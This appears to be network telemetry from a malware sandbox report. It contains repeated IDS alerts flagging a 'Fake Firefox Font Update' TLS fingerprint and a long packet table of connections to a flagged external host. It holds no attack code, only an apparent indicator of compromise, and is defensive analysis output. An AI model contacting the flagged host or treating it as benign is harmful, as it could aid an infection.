                                2024-11-26T08:13:07.999771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749870108.170.55.202443TCP
                                2024-11-26T08:13:10.086389+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749876108.170.55.202443TCP
                                2024-11-26T08:13:12.514726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749883108.170.55.202443TCP
                                2024-11-26T08:13:14.409317+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749889108.170.55.202443TCP
                                2024-11-26T08:13:16.873080+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749896108.170.55.202443TCP
                                2024-11-26T08:13:18.757808+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749901108.170.55.202443TCP
                                2024-11-26T08:13:21.057191+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749908108.170.55.202443TCP
                                2024-11-26T08:13:22.981249+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749912108.170.55.202443TCP
                                2024-11-26T08:13:25.303120+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749919108.170.55.202443TCP
                                2024-11-26T08:13:27.176743+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749925108.170.55.202443TCP
                                2024-11-26T08:13:29.476379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749931108.170.55.202443TCP
                                2024-11-26T08:13:31.616873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749936108.170.55.202443TCP
                                2024-11-26T08:13:34.158592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749943108.170.55.202443TCP
                                2024-11-26T08:13:36.181653+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749949108.170.55.202443TCP
                                2024-11-26T08:13:38.479015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749956108.170.55.202443TCP
                                2024-11-26T08:13:40.317916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749962108.170.55.202443TCP
                                2024-11-26T08:13:42.565359+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749969108.170.55.202443TCP
                                2024-11-26T08:13:44.398469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749975108.170.55.202443TCP
                                2024-11-26T08:13:46.690752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749982108.170.55.202443TCP
                                2024-11-26T08:13:48.528390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749987108.170.55.202443TCP
                                2024-11-26T08:13:50.843723+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749994108.170.55.202443TCP
                                2024-11-26T08:13:52.816807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749998108.170.55.202443TCP
                                2024-11-26T08:13:55.446370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750007108.170.55.202443TCP
                                2024-11-26T08:13:57.332730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750012108.170.55.202443TCP
                                2024-11-26T08:13:59.711182+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750019108.170.55.202443TCP
                                2024-11-26T08:14:01.552217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750024108.170.55.202443TCP
                                2024-11-26T08:14:03.797752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750031108.170.55.202443TCP
                                2024-11-26T08:14:05.871190+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750033108.170.55.202443TCP
                                2024-11-26T08:14:08.509134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750042108.170.55.202443TCP
                                2024-11-26T08:14:10.501709+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750046108.170.55.202443TCP
                                2024-11-26T08:14:13.037106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750052108.170.55.202443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 26, 2024 08:12:10.016161919 CET49701443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.016196966 CET44349701108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:10.016288042 CET49701443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.019814014 CET49701443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.019860983 CET44349701108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:10.019927979 CET49701443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.115051031 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.115104914 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:10.115241051 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.139875889 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:10.139909983 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.473593950 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.473686934 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:11.477001905 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:11.477010012 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.477253914 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.525558949 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:11.589829922 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:11.635334015 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.964827061 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.964895964 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:11.964956045 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.012799025 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.012818098 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:12.012852907 CET49702443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.012859106 CET44349702108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:12.014624119 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.014688969 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:12.014786005 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.015036106 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:12.015054941 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:13.402012110 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:13.402766943 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:13.402781010 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:13.404623032 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:13.404627085 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.034531116 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.042324066 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.042481899 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.042511940 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.046984911 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.047055960 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.047168970 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.047192097 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.047208071 CET49708443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.047214985 CET44349708108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.339895964 CET49714443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.339942932 CET44349714108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.340049028 CET49714443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.340167999 CET49714443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.340221882 CET44349714108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.340282917 CET49714443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.374778032 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.374839067 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:14.374939919 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.375274897 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:14.375297070 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:15.702950954 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:15.703178883 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:15.711822987 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:15.711846113 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:15.712121010 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:15.713253975 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:15.755342960 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.194538116 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.194602013 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.194653988 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.194884062 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.194935083 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.194951057 CET49715443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.194962025 CET44349715108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.196078062 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.196122885 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:16.196190119 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.196362972 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:16.196377039 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:17.523571968 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:17.524193048 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:17.524229050 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:17.525080919 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:17.525088072 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.133162022 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.141617060 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.141727924 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.141746998 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.142292976 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.142359018 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.142664909 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.142680883 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.142689943 CET49721443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.142697096 CET44349721108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.380394936 CET49725443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.380441904 CET44349725108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.380522013 CET49725443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.381956100 CET49725443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.381999016 CET44349725108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.382358074 CET49725443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.499325991 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.499361992 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:18.499643087 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.500080109 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:18.500092030 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:19.920125961 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:19.920233965 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:19.952872038 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:19.952905893 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:19.953197002 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:19.960510015 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.003345013 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.430715084 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.430881977 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.430948019 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.431044102 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.431061029 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.431076050 CET49728443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.431081057 CET44349728108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.432204962 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.432238102 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:20.432394028 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.432707071 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:20.432717085 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:21.806054115 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:21.806762934 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:21.806796074 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:21.807830095 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:21.807842016 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.426460028 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.426505089 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.426594019 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.426615953 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.429768085 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.429840088 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.429941893 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.429955959 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.429975033 CET49729443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.429980040 CET44349729108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.686110020 CET49736443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.686146021 CET44349736108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.686392069 CET49736443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.686525106 CET49736443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.686573029 CET44349736108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.686691046 CET49736443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.698769093 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.698818922 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:22.698904037 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.699233055 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:22.699251890 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.073182106 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.073316097 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.074872017 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.074883938 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.075144053 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.076410055 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.123339891 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.576108932 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.576186895 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.576248884 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.590677023 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.590701103 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.590713024 CET49737443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.590723991 CET44349737108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.592082977 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.592111111 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:24.592178106 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.592411041 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:24.592422962 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:25.967288017 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:25.967839956 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:25.967878103 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:25.968797922 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:25.968803883 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.594070911 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.602533102 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.602624893 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.602657080 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.606641054 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.606786966 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.606856108 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.606873035 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.606904984 CET49744443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.606910944 CET44349744108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.847978115 CET49751443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.848022938 CET44349751108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.848141909 CET49751443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.849581957 CET49751443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.849636078 CET44349751108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.849742889 CET49751443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.944430113 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.944485903 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:26.944675922 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.946022987 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:26.946038961 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:28.320497990 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:28.320612907 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:28.569971085 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:28.570013046 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:28.570517063 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:28.620831013 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:28.672669888 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:28.719336033 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.055474043 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.055541992 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.055609941 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.056060076 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.056082010 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.056097984 CET49752443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.056104898 CET44349752108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.057535887 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.057580948 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:29.057651997 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.057905912 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:29.057920933 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:30.480158091 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:30.481323957 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:30.481350899 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:30.489115000 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:30.489124060 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.115988970 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.116280079 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.116602898 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.116619110 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.120374918 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.121181011 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.121471882 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.121471882 CET49760443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.121504068 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.121515036 CET44349760108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.401447058 CET49766443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.401489019 CET44349766108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.401578903 CET49766443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.450136900 CET49766443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.450200081 CET44349766108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.453142881 CET49766443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.494309902 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.494347095 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:31.494479895 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.501871109 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:31.501888037 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:32.876208067 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:32.876399994 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:32.879209995 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:32.879225016 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:32.879514933 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:32.881007910 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:32.923340082 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.378230095 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.378432035 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.378514051 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.378735065 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.378755093 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.378767014 CET49767443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.378772974 CET44349767108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.380261898 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.380309105 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:33.380594969 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.380970955 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:33.380989075 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:34.802134991 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:34.802777052 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:34.802825928 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:34.803877115 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:34.803885937 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.436413050 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.436486959 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.436563969 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.436594009 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.439941883 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.440012932 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.514957905 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.515003920 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.515022993 CET49773443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.515031099 CET44349773108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.763251066 CET49779443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.763288021 CET44349779108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.763402939 CET49779443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.763900042 CET49779443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.763942003 CET44349779108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.764030933 CET49779443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.778203964 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.778254986 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:35.778331041 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.779098034 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:35.779114008 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.141568899 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.141813040 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.143095016 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.143105030 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.143373013 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.144628048 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.187354088 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.642726898 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.642796993 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.642857075 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.643098116 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.643116951 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.643131018 CET49780443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.643138885 CET44349780108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.644383907 CET49786443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.644416094 CET44349786108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:37.644484043 CET49786443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.644711018 CET49786443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:12:37.644726992 CET44349786108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:39.019750118 CET44349786108.170.55.202192.168.2.7
                                Nov 26, 2024 08:12:39.020661116 CET49786443192.168.2.7108.170.55.202
